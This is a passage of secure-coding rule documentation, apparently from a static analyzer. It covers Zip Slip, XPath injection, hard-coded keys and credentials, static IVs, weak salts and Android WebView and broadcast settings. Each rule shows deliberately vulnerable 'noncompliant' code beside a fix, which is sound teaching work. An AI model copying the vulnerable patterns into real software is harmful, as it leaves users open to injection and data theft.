    if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
    {
        entry.ExtractToFile(canonicalDestinationPath);
    }
}

This check can be bypassed because "/Users/Johnny".StartsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.
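The pitfall is easy to demonstrate with a plain string comparison; a minimal Java sketch (paths are hypothetical):

```java
public class PartialTraversal {
    // Naive prefix check: vulnerable when baseDir lacks a trailing
    // path separator.
    static boolean naiveCheck(String canonicalPath, String baseDir) {
        return canonicalPath.startsWith(baseDir);
    }

    public static void main(String[] args) {
        // Bypass: a sibling directory sharing the prefix passes the check.
        System.out.println(naiveCheck("/Users/Johnny/secret", "/Users/John"));  // true
        // With the trailing separator the bypass is rejected.
        System.out.println(naiveCheck("/Users/Johnny/secret", "/Users/John/")); // false
    }
}
```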


Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

roslyn.sonaranalyzer.security.cs:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
Where organizations rely on XML structures for business-critical operations, an attack can be critical; where XML is used only for innocuous data transport, it can be harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in .NET

Code examples

The following code is vulnerable to XPath injections because untrusted data is concatenated in an XPath query without prior validation.

Noncompliant code example

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult Authenticate(string user, string pass)
    {
        XmlDocument doc = new XmlDocument();

        String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

        return Json(doc.SelectSingleNode(expression) != null);
    }
}

Compliant solution

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult Authenticate(string user, string pass)
    {
        XmlDocument doc = new XmlDocument();
        if (!Regex.IsMatch(user, "^[a-zA-Z]+$") || !Regex.IsMatch(pass, "^[a-zA-Z]+$"))
        {
            return BadRequest();
        }

        String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

        return Json(doc.SelectSingleNode(expression) != null);
    }
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.

In the example, a validation mechanism is applied to untrusted input to ensure it is strictly composed of alphabetic characters.
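The character-range approach can be sketched in Java, using the same kind of regex as in the list above (method and class names are illustrative):

```java
import java.util.regex.Pattern;

public class XPathInputValidation {
    // Only alphanumeric input is accepted, so XPath metacharacters
    // such as ' " / @ = * [ ] ( ) can never reach the query.
    private static final Pattern SAFE = Pattern.compile("^[a-zA-Z0-9]+$");

    static boolean isSafe(String input) {
        return SAFE.matcher(input).matches();
    }

    public static void main(String[] args) {
        System.out.println(isSafe("alice42"));     // true
        System.out.println(isSafe("' or '1'='1")); // false
    }
}
```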

Resources

Articles & blog posts

Standards

kotlin:S6301

Why is this an issue?

Storing data locally is a common task for mobile applications. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase and Realm. These systems can be initialized with a secret key in order to store the data encrypted.

The encryption key is meant to stay secret and should not be hard-coded in the application as it would mean that:

  • All users would use the same encryption key.
  • The encryption key would be known by anyone who has access to the source code or the application binary code.
  • Data stored encrypted in the database would not be protected.

There are different approaches to how the key can be provided to encrypt and decrypt the database. One of the most convenient ways is to rely on EncryptedSharedPreferences to store encryption keys. The key can also be provided dynamically by the user of the application or fetched from a remote server.

Noncompliant code example

SQLCipher

val key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g"
val db = SQLiteDatabase.openOrCreateDatabase("test.db", key, null) // Noncompliant

Realm

val key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g"
val config = RealmConfiguration.Builder()
    .encryptionKey(key.toByteArray()) // Noncompliant
    .build()
val realm = Realm.getInstance(config)

Compliant solution

SQLCipher

val db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null)

Realm

val config = RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build()
val realm = Realm.getInstance(config)

Resources

kotlin:S6300

Storing files locally is a common task for mobile applications. Files that are stored unencrypted can be read out and modified by an attacker with physical access to the device. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The file contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local files that contain sensitive information. The class EncryptedFile can be used to easily encrypt files.

Sensitive Code Example

val targetFile = File(activity.filesDir, "data.txt")
targetFile.writeText(fileContent)  // Sensitive

Compliant Solution

val mainKey = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)

val encryptedFile = EncryptedFile.Builder(
    File(activity.filesDir, "data.txt"),
    activity,
    mainKey,
    EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
).build()

encryptedFile.openFileOutput().apply {
    write(fileContent)
    flush()
    close()
}

See

kotlin:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

val params = "password=xxxx" // Sensitive
val writer = OutputStreamWriter(getOutputStream())
writer.write(params)
writer.flush()
...
val password = "xxxx" // Sensitive
...

Compliant Solution

val params = "password=${retrievePassword()}"
val writer = OutputStreamWriter(getOutputStream())
writer.write(params)
writer.flush()
...
val password = retrievePassword()
...
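A retrievePassword() implementation typically reads the secret from an external source. A minimal Java sketch of that pattern, with an injectable lookup so the source (environment variable, config file, secrets manager) can be swapped; all names are illustrative:

```java
import java.util.Optional;
import java.util.function.Function;

public class Credentials {
    // Resolves a secret by name from an external source instead of
    // hard-coding it; fails loudly when the secret is missing.
    static String resolve(String name, Function<String, String> lookup) {
        return Optional.ofNullable(lookup.apply(name))
                .filter(v -> !v.isEmpty())
                .orElseThrow(() -> new IllegalStateException(name + " is not configured"));
    }

    public static void main(String[] args) {
        // In production the lookup would be System::getenv or a
        // secrets-manager client, e.g.:
        // String password = resolve("DB_PASSWORD", System::getenv);
    }
}
```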

See

kotlin:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease attackers' chances of successfully leaking data or stealing credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the use of the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

These clients from the Apache Commons Net library are based on unencrypted protocols and are not recommended:

val telnet = TelnetClient(); // Sensitive

val ftpClient = FTPClient(); // Sensitive

val smtpClient = SMTPClient(); // Sensitive

Unencrypted HTTP connections, when using okhttp library for instance, should be avoided:

val spec: ConnectionSpec = ConnectionSpec.Builder(ConnectionSpec.CLEARTEXT) // Sensitive
  .build()

Android WebView can be configured to allow a secure origin to load content from any other origin, even if that origin is insecure (mixed content):

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_ALWAYS_ALLOW) // Sensitive

Compliant Solution

Use these clients from Apache Commons Net and the JSch library instead:

val jsch = JSch()

if (implicit) {
  // Implicit mode is considered deprecated but offers the same security as explicit mode
  val ftpsClient = FTPSClient(true)
}
else {
  val ftpsClient = FTPSClient()
}

if (implicit) {
  // Implicit mode is considered deprecated but offers the same security as explicit mode
  val smtpsClient = SMTPSClient(true)
}
else {
  val smtpsClient = SMTPSClient()
  smtpsClient.connect("127.0.0.1", 25)
  if (smtpsClient.execTLS()) {
    // commands
  }
}

Perform HTTP encrypted connections, with okhttp library for instance:

val spec: ConnectionSpec = ConnectionSpec.Builder(ConnectionSpec.MODERN_TLS)
  .build()

The most secure mode for Android WebView is MIXED_CONTENT_NEVER_ALLOW:

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_NEVER_ALLOW)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

kotlin:S6432

Why is this an issue?

When encrypting data with a Counter (CTR) derived block cipher mode of operation, it is essential not to reuse the same initialization vector (IV) with a given key; such an IV is called a "nonce" (number used only once). Galois/Counter Mode (GCM) and Counter with Cipher Block Chaining-Message Authentication Code (CCM) are both CTR-based modes of operation.

An attacker, who has knowledge of one plaintext (original content) and ciphertext (encrypted content) pair, is able to retrieve the corresponding plaintext of any other ciphertext generated with the same IV and key. It also drastically decreases the key recovery computational complexity by downgrading it to a simpler polynomial root-finding problem.

When using GCM, NIST recommends a 96-bit nonce constructed using a 'Deterministic' approach, or at least 96 bits using a 'Random Bit Generator (RBG)'. The 'Deterministic' construction involves a counter that increments with each encryption operation. The 'RBG' construction, as the name suggests, generates the nonce using a random bit generator. Because of collision probabilities (nonce-key pair reuse), the 'RBG-based' approach requires a shorter key rotation period: at most 2^32 invocations per key.
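The 'Deterministic' construction can be sketched as follows. Java is used for illustration (the report's Kotlin examples run on the same JVM APIs); the fixed-field/counter split shown here is one common 96-bit layout, not mandated by the rule:

```java
import java.nio.ByteBuffer;

public class GcmNonceCounter {
    // Deterministic 96-bit GCM nonce: a 32-bit fixed field identifying
    // the device or context, plus a 64-bit invocation counter that is
    // incremented for every encryption under the same key.
    private final int fixedField;
    private long counter = 0;

    GcmNonceCounter(int fixedField) {
        this.fixedField = fixedField;
    }

    byte[] next() {
        return ByteBuffer.allocate(12) // 96 bits
                .putInt(fixedField)
                .putLong(counter++)
                .array();
    }

    public static void main(String[] args) {
        GcmNonceCounter nonces = new GcmNonceCounter(0x01);
        System.out.println(nonces.next().length); // 12
    }
}
```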

Noncompliant code example

fun encrypt(key: ByteArray, ptxt: ByteArray) {
    val nonce: ByteArray = "7cVgr5cbdCZV".toByteArray() // The initialization vector is a static value

    val gcmSpec  = GCMParameterSpec(128, nonce) // The initialization vector is configured here
    val skeySpec = SecretKeySpec(key, "AES")

    val cipher: Cipher = Cipher.getInstance("AES/GCM/NoPadding")
    cipher.init(Cipher.ENCRYPT_MODE, skeySpec, gcmSpec) // Noncompliant
}

Compliant solution

fun encrypt(key: ByteArray, ptxt: ByteArray) {
    val random: SecureRandom = SecureRandom()
    val nonce: ByteArray     = ByteArray(12)
    random.nextBytes(nonce) // Random 96 bit IV

    val gcmSpec  = GCMParameterSpec(128, nonce)
    val skeySpec = SecretKeySpec(key, "AES")

    val cipher: Cipher = Cipher.getInstance("AES/GCM/NoPadding")
    cipher.init(Cipher.ENCRYPT_MODE, skeySpec, gcmSpec)
}

Resources

kotlin:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import java.nio.charset.StandardCharsets
import java.security.InvalidAlgorithmParameterException
import java.security.InvalidKeyException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import javax.crypto.spec.IvParameterSpec
import javax.crypto.spec.SecretKeySpec

fun encrypt(key: String, plainText: String) {

    val ivBytes = "7cVgr5cbdCZVw5WY".toByteArray(StandardCharsets.UTF_8) // Hard-coded, predictable IV

    val iv      = IvParameterSpec(ivBytes)
    val keySpec = SecretKeySpec(key.toByteArray(StandardCharsets.UTF_8), "AES")

    try {
        val cipher = Cipher.getInstance("AES/CBC/NoPadding")
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv) // Noncompliant

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidKeyException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

Compliant solution

In this example, the code explicitly uses a random number generator that is considered strong.

import java.nio.charset.StandardCharsets
import java.security.SecureRandom
import java.security.InvalidAlgorithmParameterException
import java.security.InvalidKeyException
import java.security.NoSuchAlgorithmException
import javax.crypto.Cipher
import javax.crypto.NoSuchPaddingException
import javax.crypto.spec.IvParameterSpec
import javax.crypto.spec.SecretKeySpec

fun encrypt(key: String, plainText: String) {

    val random      = SecureRandom()
    val randomBytes = ByteArray(16)
    random.nextBytes(randomBytes) // Fresh, random 128-bit IV for each encryption

    val iv      = IvParameterSpec(randomBytes)
    val keySpec = SecretKeySpec(key.toByteArray(StandardCharsets.UTF_8), "AES")

    try {
        val cipher = Cipher.getInstance("AES/CBC/NoPadding")
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv)

    } catch (e: NoSuchAlgorithmException) {
        // ...
    } catch (e: InvalidKeyException) {
        // ...
    } catch (e: NoSuchPaddingException) {
        // ...
    } catch (e: InvalidAlgorithmParameterException) {
        // ...
    }
}

How does this work?

Use unique IVs

To ensure strong security, the initialization vector for each encryption operation must be unique and random, but it does not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

kotlin:S4347

Why is this an issue?

The java.security.SecureRandom class provides a strong random number generator (RNG) appropriate for cryptography. However, seeding it with a constant or another predictable value will weaken it significantly. In general, it is much safer to rely on the seed provided by the SecureRandom implementation.

This rule raises an issue when SecureRandom.setSeed() or SecureRandom(byte[]) are called with a seed that is either one of:

  • a constant
  • the system time

Noncompliant code example

val sr = SecureRandom()
sr.setSeed(123456L) // Noncompliant
val v = sr.nextInt()

val sr2 = SecureRandom("abcdefghijklmnop".toByteArray(charset("us-ascii"))) // Noncompliant
val v2 = sr2.nextInt()

Compliant solution

val sr = SecureRandom()
val v = sr.nextInt()

Resources

kotlin:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on applications distributed to end users.

Sensitive Code Example

WebView.setWebContentsDebuggingEnabled(true) for Android enables debugging support:

import android.webkit.WebView

WebView.setWebContentsDebuggingEnabled(true) // Sensitive

Compliant Solution

WebView.setWebContentsDebuggingEnabled(false) for Android disables debugging support:

import android.webkit.WebView

WebView.setWebContentsDebuggingEnabled(false)

See

kotlin:S6363

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered.

If malicious JavaScript code in a WebView is executed this can leak the contents of sensitive files when access to local files is enabled.

Ask Yourself Whether

  • No local files have to be accessed by the WebView.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable access to local files for WebViews unless it is necessary. In the case of a successful attack through a Cross-Site Scripting vulnerability, the attacker's attack surface decreases drastically if no files can be read.

Sensitive Code Example

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setAllowContentAccess(true) // Sensitive
webView.getSettings().setAllowFileAccess(true) // Sensitive

Compliant Solution

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setAllowContentAccess(false)
webView.getSettings().setAllowFileAccess(false)

See

kotlin:S6362

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered. In the context of a WebView, JavaScript code can exfiltrate local files that might be sensitive or, even worse, access exposed functions of the application, which can result in more severe vulnerabilities such as code injection. Thus, JavaScript support should not be enabled for WebViews unless it is absolutely necessary and the authenticity of the web resources can be guaranteed.

Ask Yourself Whether

  • The WebView only renders static web content that does not require JavaScript code to be executed.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable JavaScript support for WebViews unless it is necessary to execute JavaScript code. Only trusted pages should be rendered.

Sensitive Code Example

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setJavaScriptEnabled(true) // Sensitive

Compliant Solution

import android.webkit.WebView

val webView: WebView = findViewById(R.id.webview)
webView.getSettings().setJavaScriptEnabled(false)

See

kotlin:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest Android will start the application if it is not already running once a matching broadcast is received. The receiver is an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver
import android.content.Context
import android.content.IntentFilter
import android.os.Build
import android.os.Handler
import androidx.annotation.RequiresApi

class MyIntentReceiver {
    @RequiresApi(api = Build.VERSION_CODES.O)
    fun register(
        context: Context, receiver: BroadcastReceiver?,
        filter: IntentFilter?,
        scheduler: Handler?,
        flags: Int
    ) {
        context.registerReceiver(receiver, filter) // Sensitive
        context.registerReceiver(receiver, filter, flags) // Sensitive

        // Broadcasting intent with "null" for broadcastPermission
        context.registerReceiver(receiver, filter, null, scheduler) // Sensitive
        context.registerReceiver(receiver, filter, null, scheduler, flags) // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver
import android.content.Context
import android.content.IntentFilter
import android.os.Build
import android.os.Handler
import androidx.annotation.RequiresApi

class MyIntentReceiver {
    @RequiresApi(api = Build.VERSION_CODES.O)
    fun register(
        context: Context, receiver: BroadcastReceiver?,
        filter: IntentFilter?,
        broadcastPermission: String?,
        scheduler: Handler?,
        flags: Int
    ) {
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler)
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler, flags)
    }
}

See

kotlin:S5324

Storing data locally is a common task for mobile applications. Such data includes files among other things. One convenient way to store files is to use the external file storage which usually offers a larger amount of disc space compared to internal storage.

Files created on the external storage are globally readable and writable. Therefore, a malicious application having the permissions WRITE_EXTERNAL_STORAGE or READ_EXTERNAL_STORAGE could try to read sensitive information from the files that other applications have stored on the external storage.

External storage can also be removed by the user (e.g. when it is based on an SD card), making the files unavailable to the application.

Ask Yourself Whether

Your application uses external storage to:

  • store files that contain sensitive data.
  • store files that are not meant to be shared with other applications.
  • store files that are critical for the application to work.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use internal storage whenever possible as the system prevents other apps from accessing this location.
  • Only use external storage if you need to share non-sensitive files with other applications.
  • If your application has to use the external storage to store sensitive data, make sure it encrypts the files using EncryptedFile.
  • Data coming from external storage should always be considered untrusted and should be validated.
  • As some external storage can be removed, make sure to never store files on it that are critical for the usability of your application.

Sensitive Code Example

import android.content.Context

class AccessExternalFiles {

    fun accessFiles(context: Context) {
        context.getExternalFilesDir(null) // Sensitive
    }
}

Compliant Solution

import android.content.Context
import android.os.Environment

class AccessExternalFiles {

    fun accessFiles(context: Context) {
        context.getFilesDir()
    }
}

See

kotlin:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' password-and-salt pairs depends on the salt size: the shorter the salt, the higher the collision probability. In any case, a longer, cryptographically secure salt should be preferred.
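The birthday bound makes this concrete. Assuming uniformly random salts of b bits shared among n users, the probability of at least one salt collision is approximately 1 − e^(−n(n−1)/2^(b+1)). The sketch below compares a short 32-bit salt with the recommended 128-bit one; the user count is an illustrative assumption.

```kotlin
import kotlin.math.exp
import kotlin.math.pow

// Birthday-bound approximation: probability that at least two of n users
// end up with the same b-bit random salt.
fun saltCollisionProbability(n: Double, bits: Int): Double =
    1.0 - exp(-n * (n - 1) / (2.0 * 2.0.pow(bits)))

fun main() {
    // A short 32-bit salt: among a million users, a collision is almost certain.
    println(saltCollisionProbability(1_000_000.0, 32))
    // A 128-bit salt: the collision probability is negligible.
    println(saltCollisionProbability(1_000_000.0, 128))
}
```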

How to fix it in Java SE

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import javax.crypto.spec.PBEParameterSpec

fun hash() {
    val salt = "salty".toByteArray()
    val cipherSpec = PBEParameterSpec(salt, 10000) // Noncompliant
}

Compliant solution

import java.security.SecureRandom
import javax.crypto.spec.PBEParameterSpec

fun hash() {
    val random = SecureRandom()
    val salt = ByteArray(16)
    random.nextBytes(salt)
    val cipherSpec = PBEParameterSpec(salt, 10000)
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the nextBytes method from the SecureRandom class with a salt buffer of 16 bytes. This class implements a cryptographically secure pseudo-random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
kotlin:S5320

In Android applications, broadcasting intents is security-sensitive. For example, it has led in the past to the following vulnerability:

By default, broadcasted intents are visible to every application, exposing all sensitive information they contain.

This rule raises an issue when an intent is broadcasted without specifying any "receiver permission".

Ask Yourself Whether

  • The intent contains sensitive information.
  • Intent reception is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.os.Handler
import android.os.UserHandle

class MyIntentBroadcast {
    fun broadcast(intent: Intent,
                  context: Context,
                  user: UserHandle,
                  resultReceiver: BroadcastReceiver,
                  scheduler: Handler,
                  initialCode: Int,
                  initialData: String,
                  initialExtras: Bundle,
                  broadcastPermission: String) {
        context.sendBroadcast(intent) // Sensitive
        context.sendBroadcastAsUser(intent, user) // Sensitive

        // Broadcasting intent with "null" for receiverPermission
        context.sendBroadcast(intent, null) // Sensitive
        context.sendBroadcastAsUser(intent, user, null) // Sensitive
        context.sendOrderedBroadcast(intent, null) // Sensitive
        context.sendOrderedBroadcastAsUser(intent, user, null, resultReceiver,
            scheduler, initialCode, initialData, initialExtras) // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.os.Handler
import android.os.UserHandle

class MyIntentBroadcast {
    fun broadcast(intent: Intent,
                  context: Context,
                  user: UserHandle,
                  resultReceiver: BroadcastReceiver,
                  scheduler: Handler,
                  initialCode: Int,
                  initialData: String,
                  initialExtras: Bundle,
                  broadcastPermission: String) {

        context.sendBroadcast(intent, broadcastPermission)
        context.sendBroadcastAsUser(intent, user, broadcastPermission)
        context.sendOrderedBroadcast(intent, broadcastPermission)
        context.sendOrderedBroadcastAsUser(intent, user, broadcastPermission, resultReceiver,
            scheduler, initialCode, initialData, initialExtras)
    }
}

See

kotlin:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

